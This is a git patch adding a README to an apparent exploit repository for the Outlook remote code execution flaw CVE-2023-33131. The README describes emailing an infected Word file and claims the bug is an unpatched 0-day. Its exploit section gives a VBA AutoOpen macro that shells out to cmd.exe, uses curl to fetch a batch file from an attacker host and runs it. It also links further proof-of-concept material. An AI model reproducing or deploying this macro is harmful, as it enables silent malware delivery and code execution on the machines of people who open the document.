From dc6babc68f1db324ccd733502c14872c6826d914 Mon Sep 17 00:00:00 2001
From: nu11secur1ty <venvaropt@gmail.com>
Date: Fri, 7 Jul 2023 15:06:18 +0300
Subject: [PATCH] Update README.MD

---
 2023/CVE-2023-33131/README.MD | 27 +++++++++++++++++++++++++++
 1 file changed, 27 insertions(+)

diff --git a/2023/CVE-2023-33131/README.MD b/2023/CVE-2023-33131/README.MD
index a0de4cd..d238164 100644
--- a/2023/CVE-2023-33131/README.MD
+++ b/2023/CVE-2023-33131/README.MD
@@ -1,3 +1,30 @@
 ## [CVE-2023-33131-Microsoft Outlook Remote Code Execution Vulnerability](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-33131)
 
 ![](https://github.com/nu11secur1ty/Windows11Exploits/blob/main/2023/CVE-2023-33131/docs/Screenshot%202023-07-07%20144423.png)
+
+## Description:
+In this vulnerability, the Microsoft Outlook app allows an attacker to send an infected Word file with malicious content 
+to everyone who using the Outlook app, no matter web or local.
+Microsoft still doesn't have a patch against this 0-day vulnerability today.
+
+## Staus: HIGH Vulnerability
+
+[+]Exploit:
+
+- The malicious Word file:
+
+```js
+Sub AutoOpen()
+  Call Shell("cmd.exe /S /c" & "curl -s https://attacker/namaikativputkata/sichko/nikoganqqsaopraite.bat > nikoganqqsaopraite.bat && .\nikoganqqsaopraite.bat", vbNormalFocus)
+End Sub
+
+```
+
+## Reproduce:
+[href](https://github.com/nu11secur1ty/Windows11Exploits/tree/main/2023/CVE-2023-33131)
+
+## Proof and Exploit
+[href](https://www.nu11secur1ty.com/2023/07/cve-2023-33131-microsoft-outlook.html)
+
+## Time spend:
+00:30:00